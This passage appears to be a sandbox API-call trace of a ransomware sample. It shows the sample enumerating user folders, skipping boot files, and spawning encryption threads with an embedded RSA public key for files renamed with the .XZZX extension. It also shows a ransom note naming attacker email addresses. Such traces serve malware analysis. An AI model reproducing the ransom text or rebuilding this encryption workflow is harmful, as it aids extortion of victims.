(lpFirst="D9B986602FBC15FEC37446303428FA46.XZZX", lpSrch="ntdetect.com") returned 0x0 [0182.682] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0182.682] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") [0182.682] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0182.682] lstrcpyW (in: lpString1=0x17be7c, lpString2="D9B986602FBC15FEC37446303428FA46.XZZX" | out: lpString1="D9B986602FBC15FEC37446303428FA46.XZZX") returned="D9B986602FBC15FEC37446303428FA46.XZZX" [0182.682] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0182.683] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb98 [0182.683] Sleep (dwMilliseconds=0x96) [0182.837] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.837] lstrcmpW (lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpString2="..") returned 1 [0182.837] lstrcmpW (lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpString2=".") returned 1 [0182.838] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0182.838] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="ntldr") returned 0x0 [0182.838] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="NTLDR") returned 0x0 [0182.838] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0182.838] StrStrW (lpFirst="FD9D491315D8C1EEE26AF31719F0A636.XZZX", lpSrch="ntdetect.com") returned 0x0 [0182.838] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 57 [0182.838] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") [0182.838] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0182.838] lstrcpyW (in: lpString1=0x17be7c, lpString2="FD9D491315D8C1EEE26AF31719F0A636.XZZX" | out: lpString1="FD9D491315D8C1EEE26AF31719F0A636.XZZX") returned="FD9D491315D8C1EEE26AF31719F0A636.XZZX" [0182.838] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0182.838] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb9c [0182.839] Sleep (dwMilliseconds=0x96) [0182.993] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.993] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0182.993] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0182.993] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0182.993] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0182.994] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0182.994] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0182.994] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0182.994] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*" [0182.994] SetErrorMode (uMode=0x1) returned 0x1 [0182.994] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT") returned 74 [0182.995] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0182.995] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0182.995] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xba0) returned 0x0 [0182.995] RegQueryValueExW (in: hKey=0xba0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437dbe8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x437dbe8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0182.995] RegCloseKey (hKey=0xba0) returned 0x0 [0182.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0182.995] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0182.995] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xba0 [0182.996] CloseHandle (hObject=0xba0) returned 1 [0182.996] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0182.996] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="Windows Live" [0182.996] lstrcpyW (in: lpString1=0x17b644, lpString2="Windows Live" | out: lpString1="Windows Live") returned="Windows Live" [0182.996] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0182.996] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.996] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.997] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.997] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.997] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.997] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.997] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.997] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0182.997] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0182.997] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0182.997] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0182.997] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0182.997] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0182.997] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0182.997] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0182.997] FindNextFileW (in: hFindFile=0x43723f8, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0182.997] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0182.997] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0182.997] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0182.997] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0182.997] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0182.998] SetErrorMode (uMode=0x1) returned 0x1 [0182.998] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0182.998] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0182.998] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0182.998] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0182.998] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0182.998] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="Links" [0182.998] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Links" | out: lpString1="Links") returned="Links" [0182.998] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0182.998] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0182.998] lstrcmpW (lpString1="02D36BF7229FBF1A2D198367271CA362.XZZX", lpString2="..") returned 1 [0182.998] lstrcmpW (lpString1="02D36BF7229FBF1A2D198367271CA362.XZZX", lpString2=".") returned 1 [0182.998] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0182.998] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="ntldr") returned 0x0 [0182.998] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="NTLDR") returned 0x0 [0182.998] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0182.998] StrStrW (lpFirst="02D36BF7229FBF1A2D198367271CA362.XZZX", lpSrch="ntdetect.com") returned 0x0 [0182.998] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0182.998] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") [0182.999] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0182.999] lstrcpyW (in: lpString1=0x17cf1c, lpString2="02D36BF7229FBF1A2D198367271CA362.XZZX" | out: lpString1="02D36BF7229FBF1A2D198367271CA362.XZZX") returned="02D36BF7229FBF1A2D198367271CA362.XZZX" [0182.999] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0182.999] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xba8 [0182.999] Sleep (dwMilliseconds=0x96) [0183.149] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0183.149] lstrcmpW (lpString1="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpString2="..") returned 1 [0183.149] lstrcmpW (lpString1="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpString2=".") returned 1 [0183.149] StrStrW (lpFirst="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0183.149] StrStrW (lpFirst="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpSrch="ntldr") returned 0x0 [0183.149] StrStrW (lpFirst="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpSrch="NTLDR") returned 0x0 [0183.150] StrStrW (lpFirst="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0183.150] StrStrW (lpFirst="323285543E8B2CB8C06CF7B742AC1100.XZZX", lpSrch="ntdetect.com") returned 0x0 [0183.150] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0183.150] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") [0183.150] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0183.150] lstrcpyW (in: lpString1=0x17cf1c, lpString2="323285543E8B2CB8C06CF7B742AC1100.XZZX" | out: lpString1="323285543E8B2CB8C06CF7B742AC1100.XZZX") returned="323285543E8B2CB8C06CF7B742AC1100.XZZX" [0183.150] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0183.150] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbac [0183.151] Sleep (dwMilliseconds=0x96) [0183.306] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0183.306] lstrcmpW (lpString1="61C67744188385C0EADA50E91CF06A08.XZZX", lpString2="..") returned 1 [0183.306] lstrcmpW (lpString1="61C67744188385C0EADA50E91CF06A08.XZZX", lpString2=".") returned 1 [0183.306] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0183.306] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="ntldr") returned 0x0 [0183.306] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="NTLDR") returned 0x0 [0183.306] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0183.306] StrStrW (lpFirst="61C67744188385C0EADA50E91CF06A08.XZZX", lpSrch="ntdetect.com") returned 0x0 [0183.306] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0183.306] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") [0183.306] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0183.306] lstrcpyW (in: lpString1=0x17cf1c, lpString2="61C67744188385C0EADA50E91CF06A08.XZZX" | out: lpString1="61C67744188385C0EADA50E91CF06A08.XZZX") returned="61C67744188385C0EADA50E91CF06A08.XZZX" [0183.306] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0183.306] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xbb0 [0183.307] Sleep (dwMilliseconds=0x96) [0183.461] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0183.461] lstrcmpW (lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpString2="..") returned 1 [0183.461] lstrcmpW (lpString1="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpString2=".") returned 1 [0183.461] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0183.461] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="ntldr") returned 0x0 [0183.461] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="NTLDR") returned 0x0 [0183.461] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0183.461] StrStrW (lpFirst="AFA4CBC047178B40A7E7AA8D4B2F6F88.XZZX", lpSrch="ntdetect.com") returned 0x0 [0183.461] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0183.462] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") [0183.462] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 